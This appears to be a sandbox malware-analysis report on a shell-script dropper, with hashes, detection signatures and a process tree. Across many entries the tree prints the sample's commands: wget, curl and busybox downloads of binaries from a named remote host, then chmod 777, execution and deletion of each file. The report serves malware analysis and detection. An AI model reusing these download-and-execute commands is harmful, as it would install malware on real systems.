Analysis
- max time kernel: 85s
- max time network: 86s
- platform: debian-9_mipsel
- resource: debian9-mipsel-20240418-en
- resource tags: arch:mipsel, image:debian9-mipsel-20240418-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mipsel, system
- submitted: 25/10/2024, 01:24
Static task
static1
Behavioral task
behavioral1
Sample
38b6ef1cd1a94cd58395df3d4f0581f71e26cfebba88cb85d4b4c280f37ac764.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
38b6ef1cd1a94cd58395df3d4f0581f71e26cfebba88cb85d4b4c280f37ac764.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
38b6ef1cd1a94cd58395df3d4f0581f71e26cfebba88cb85d4b4c280f37ac764.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
38b6ef1cd1a94cd58395df3d4f0581f71e26cfebba88cb85d4b4c280f37ac764.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
38b6ef1cd1a94cd58395df3d4f0581f71e26cfebba88cb85d4b4c280f37ac764.sh
-
Size
10KB
-
MD5
04d0449c41da21e91fcff668642e400d
-
SHA1
2a7724ac4a33aef57e864b4ab2ba41126ab9d3c0
-
SHA256
38b6ef1cd1a94cd58395df3d4f0581f71e26cfebba88cb85d4b4c280f37ac764
-
SHA512
5c0f07e89ce67dfddfc6e90649fe73b20d8f460fd230aa8a787e68c8bafa8ac1acd949b497d7a0b0b55512ce9910ea9ea43bec6f80131074b11222c8fdab2094
-
SSDEEP
192:I5OQ49pUXvxwks6Pk+Y+k+j+2+e+Z7HTgG+HB6HTgGwNPk9pUXvfwks64+Y+k+j+:I5OQN6N+HB4wNPM
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process
750 chmod
940 chmod
968 chmod
982 chmod
853 chmod
884 chmod
954 chmod
898 chmod
905 chmod
912 chmod
947 chmod
961 chmod
989 chmod
1010 chmod
877 chmod
891 chmod
996 chmod
832 chmod
933 chmod
1003 chmod
1017 chmod
846 chmod
860 chmod
919 chmod
926 chmod
839 chmod
870 chmod
975 chmod
Executes dropped EXE 28 IoCs
ioc pid Process
/tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ 751 wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ
/tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z 833 pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z
/tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI 840 VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI
/tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0 847 ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0
/tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf 854 bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf
/tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk 861 TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk
/tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh 871 KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh
/tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC 878 zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC
/tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR 885 Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR
/tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx 892 9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx
/tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu 899 8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu
/tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY 906 cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY
/tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 913 4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959
/tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR 920 res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR
/tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu 927 8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu
/tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY 934 cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY
/tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 941 4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959
/tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR 948 res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR
/tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ 955 wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ
/tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z 962 pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z
/tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI 969 VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI
/tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0 976 ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0
/tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf 983 bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf
/tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk 990 TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk
/tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh 997 KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh
/tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC 1004 zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC
/tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR 1011 Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR
/tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx 1018 9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx
Reads runtime system information 28 IoCs
description ioc Process
File opened for reading /proc/sys/crypto/fips_enabled curl (28 identical entries)
System Network Configuration Discovery 1 TTPs 64 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process
951 curl
993 curl
835 wget
915 wget
1009 busybox
981 busybox
992 wget
739 curl
916 curl
936 wget
944 curl
883 busybox
887 wget
908 wget
909 curl
922 wget
930 curl
957 wget
979 curl
985 wget
988 busybox
873 wget
888 curl
943 wget
953 busybox
894 wget
923 curl
925 busybox
929 wget
749 busybox
857 curl
863 wget
890 busybox
1014 curl
960 busybox
978 wget
986 curl
1013 wget
939 busybox
964 wget
1002 busybox
1007 curl
799 curl
859 busybox
880 wget
902 curl
1016 busybox
850 curl
852 busybox
856 wget
937 curl
869 busybox
874 curl
876 busybox
895 curl
723 wget
831 busybox
838 busybox
965 curl
999 wget
904 busybox
946 busybox
967 busybox
995 busybox
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process
File opened for modification /tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 curl
File opened for modification /tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk curl
File opened for modification /tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI curl
File opened for modification /tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR curl
File opened for modification /tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk curl
File opened for modification /tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC curl
File opened for modification /tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh curl
File opened for modification /tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx curl
File opened for modification /tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR curl
File opened for modification /tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR curl
File opened for modification /tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC curl
File opened for modification /tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu curl
File opened for modification /tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z curl
File opened for modification /tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf curl
File opened for modification /tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z curl
File opened for modification /tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh curl
File opened for modification /tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY curl
File opened for modification /tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0 curl
File opened for modification /tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0 curl
File opened for modification /tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY curl
File opened for modification /tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR curl
File opened for modification /tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu curl
File opened for modification /tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ curl
File opened for modification /tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx curl
File opened for modification /tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 curl
File opened for modification /tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI curl
File opened for modification /tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ curl
File opened for modification /tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf curl
Processes
Each entry: PID (process-tree depth) executable path: command line [signatures]
- PID:718 (depth 1) /tmp/38b6ef1cd1a94cd58395df3d4f0581f71e26cfebba88cb85d4b4c280f37ac764.sh: /tmp/38b6ef1cd1a94cd58395df3d4f0581f71e26cfebba88cb85d4b4c280f37ac764.sh
- PID:720 (depth 2) /bin/rm: /bin/rm bins.sh
- PID:723 (depth 2) /usr/bin/wget: wget http://conn.masjesu.zip/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ [System Network Configuration Discovery]
- PID:739 (depth 2) /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
- PID:749 (depth 2) /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ [System Network Configuration Discovery]
- PID:750 (depth 2) /bin/chmod: chmod 777 wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ [File and Directory Permissions Modification]
- PID:751 (depth 2) /tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ: ./wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ [Executes dropped EXE]
- PID:752 (depth 2) /bin/rm: rm wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ
- PID:753 (depth 2) /usr/bin/wget: wget http://conn.masjesu.zip/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z
- PID:799 (depth 2) /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
- PID:831 (depth 2) /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z [System Network Configuration Discovery]
- PID:832 (depth 2) /bin/chmod: chmod 777 pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z [File and Directory Permissions Modification]
- PID:833 (depth 2) /tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z: ./pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z [Executes dropped EXE]
- PID:834 (depth 2) /bin/rm: rm pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z
- PID:835 (depth 2) /usr/bin/wget: wget http://conn.masjesu.zip/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI [System Network Configuration Discovery]
- PID:836 (depth 2) /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI [Reads runtime system information; Writes file to tmp directory]
- PID:838 (depth 2) /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI [System Network Configuration Discovery]
- PID:839 (depth 2) /bin/chmod: chmod 777 VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI [File and Directory Permissions Modification]
- PID:840 (depth 2) /tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI: ./VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI [Executes dropped EXE]
- PID:841 (depth 2) /bin/rm: rm VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI
- PID:842 (depth 2) /usr/bin/wget: wget http://conn.masjesu.zip/bins/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0
- PID:843 (depth 2) /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0 [Reads runtime system information; Writes file to tmp directory]
- PID:845 (depth 2) /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0
- PID:846 (depth 2) /bin/chmod: chmod 777 ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0 [File and Directory Permissions Modification]
- PID:847 (depth 2) /tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0: ./ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0 [Executes dropped EXE]
- PID:848 (depth 2) /bin/rm: rm ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0
- PID:849 (depth 2) /usr/bin/wget: wget http://conn.masjesu.zip/bins/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf
- PID:850 (depth 2) /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
- PID:852 (depth 2) /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf [System Network Configuration Discovery]
- PID:853 (depth 2) /bin/chmod: chmod 777 bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf [File and Directory Permissions Modification]
- PID:854 (depth 2) /tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf: ./bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf [Executes dropped EXE]
- PID:855 (depth 2) /bin/rm: rm bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf
- PID:856 (depth 2) /usr/bin/wget: wget http://conn.masjesu.zip/bins/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk [System Network Configuration Discovery]
- PID:857 (depth 2) /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
- PID:859 (depth 2) /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk [System Network Configuration Discovery]
- PID:860 (depth 2) /bin/chmod: chmod 777 TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk [File and Directory Permissions Modification]
- PID:861 (depth 2) /tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk: ./TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk [Executes dropped EXE]
- PID:862 (depth 2) /bin/rm: rm TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk
- PID:863 (depth 2) /usr/bin/wget: wget http://conn.masjesu.zip/bins/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh [System Network Configuration Discovery]
- PID:864 (depth 2) /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh [Reads runtime system information; Writes file to tmp directory]
- PID:869 (depth 2) /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh [System Network Configuration Discovery]
- PID:870 (depth 2) /bin/chmod: chmod 777 KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh [File and Directory Permissions Modification]
- PID:871 (depth 2) /tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh: ./KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh [Executes dropped EXE]
- PID:872 (depth 2) /bin/rm: rm KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh
- PID:873 (depth 2) /usr/bin/wget: wget http://conn.masjesu.zip/bins/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC [System Network Configuration Discovery]
- PID:874 (depth 2) /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
- PID:876 (depth 2) /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC [System Network Configuration Discovery]
- PID:877 (depth 2) /bin/chmod: chmod 777 zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC [File and Directory Permissions Modification]
- PID:878 (depth 2) /tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC: ./zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC [Executes dropped EXE]
- PID:879 (depth 2) /bin/rm: rm zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC
- PID:880 (depth 2) /usr/bin/wget: wget http://conn.masjesu.zip/bins/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR [System Network Configuration Discovery]
- PID:881 (depth 2) /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR [Reads runtime system information; Writes file to tmp directory]
- PID:883 (depth 2) /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR [System Network Configuration Discovery]
- PID:884 (depth 2) /bin/chmod: chmod 777 Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR [File and Directory Permissions Modification]
- PID:885 (depth 2) /tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR: ./Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR [Executes dropped EXE]
- PID:886 (depth 2) /bin/rm: rm Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR
- PID:887 (depth 2) /usr/bin/wget: wget http://conn.masjesu.zip/bins/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx [System Network Configuration Discovery]
- PID:888 (depth 2) /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
- PID:890 (depth 2) /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx [System Network Configuration Discovery]
- PID:891 (depth 2) /bin/chmod: chmod 777 9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx [File and Directory Permissions Modification]
- PID:892 (depth 2) /tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx: ./9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx [Executes dropped EXE]
- PID:893 (depth 2) /bin/rm: rm 9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx
- PID:894 (depth 2) /usr/bin/wget: wget http://conn.masjesu.zip/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu [System Network Configuration Discovery]
- PID:895 (depth 2) /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
- PID:897 (depth 2) /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu
- PID:898 (depth 2) /bin/chmod: chmod 777 8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu [File and Directory Permissions Modification]
- PID:899 (depth 2) /tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu: ./8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu [Executes dropped EXE]
- PID:900 (depth 2) /bin/rm: rm 8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu
- PID:901 (depth 2) /usr/bin/wget: wget http://conn.masjesu.zip/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY
- PID:902 (depth 2) /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
- PID:904 (depth 2) /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY [System Network Configuration Discovery]
- PID:905 (depth 2) /bin/chmod: chmod 777 cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY [File and Directory Permissions Modification]
- PID:906 (depth 2) /tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY: ./cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY [Executes dropped EXE]
- PID:907 (depth 2) /bin/rm: rm cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY
- PID:908 (depth 2) /usr/bin/wget: wget http://conn.masjesu.zip/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 [System Network Configuration Discovery]
- PID:909 (depth 2) /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
- PID:911 (depth 2) /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959
- PID:912 (depth 2) /bin/chmod: chmod 777 4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 [File and Directory Permissions Modification]
- PID:913 (depth 2) /tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959: ./4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 [Executes dropped EXE]
- PID:914 (depth 2) /bin/rm: rm 4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959
- PID:915 (depth 2) /usr/bin/wget: wget http://conn.masjesu.zip/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR [System Network Configuration Discovery]
- PID:916 (depth 2) /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
- PID:918 (depth 2) /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR
- PID:919 (depth 2) /bin/chmod: chmod 777 res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR [File and Directory Permissions Modification]
- PID:920 (depth 2) /tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR: ./res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR [Executes dropped EXE]
- PID:921 (depth 2) /bin/rm: rm res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR
- PID:922 (depth 2) /usr/bin/wget: wget http://conn.masjesu.zip/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu [System Network Configuration Discovery]
- PID:923 (depth 2) /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
- PID:925 (depth 2) /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu [System Network Configuration Discovery]
- PID:926 (depth 2) /bin/chmod: chmod 777 8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu [File and Directory Permissions Modification]
- PID:927 (depth 2) /tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu: ./8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu [Executes dropped EXE]
- PID:928 (depth 2) /bin/rm: rm 8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu
- PID:929 (depth 2) /usr/bin/wget: wget http://conn.masjesu.zip/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY [System Network Configuration Discovery]
- PID:930 (depth 2) /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
- PID:932 (depth 2) /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY
- PID:933 (depth 2) /bin/chmod: chmod 777 cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY [File and Directory Permissions Modification]
- PID:934 (depth 2) /tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY: ./cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY [Executes dropped EXE]
- PID:935 (depth 2) /bin/rm: rm cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY
- PID:936 (depth 2) /usr/bin/wget: wget http://conn.masjesu.zip/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 [System Network Configuration Discovery]
- PID:937 (depth 2) /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
- PID:939 (depth 2) /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 [System Network Configuration Discovery]
- PID:940 (depth 2) /bin/chmod: chmod 777 4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 [File and Directory Permissions Modification]
- PID:941 (depth 2) /tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959: ./4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 [Executes dropped EXE]
- PID:942 (depth 2) /bin/rm: rm 4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959
- PID:943 (depth 2) /usr/bin/wget: wget http://conn.masjesu.zip/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR [System Network Configuration Discovery]
- PID:944 (depth 2) /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
- PID:946 (depth 2) /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR [System Network Configuration Discovery]
- PID:947 (depth 2) /bin/chmod: chmod 777 res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR [File and Directory Permissions Modification]
- PID:948 (depth 2) /tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR: ./res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR [Executes dropped EXE]
- PID:949 (depth 2) /bin/rm: rm res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR
- PID:950 (depth 2) /usr/bin/wget: wget http://conn.masjesu.zip/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ
- PID:951 (depth 2) /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
- PID:953 (depth 2) /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ [System Network Configuration Discovery]
- PID:954 (depth 2) /bin/chmod: chmod 777 wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ [File and Directory Permissions Modification]
- PID:955 (depth 2) /tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ: ./wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ [Executes dropped EXE]
- PID:956 (depth 2) /bin/rm: rm wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ
- PID:957 (depth 2) /usr/bin/wget: wget http://conn.masjesu.zip/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z [System Network Configuration Discovery]
- PID:958 (depth 2) /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z [Reads runtime system information; Writes file to tmp directory]
- PID:960 (depth 2) /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z [System Network Configuration Discovery]
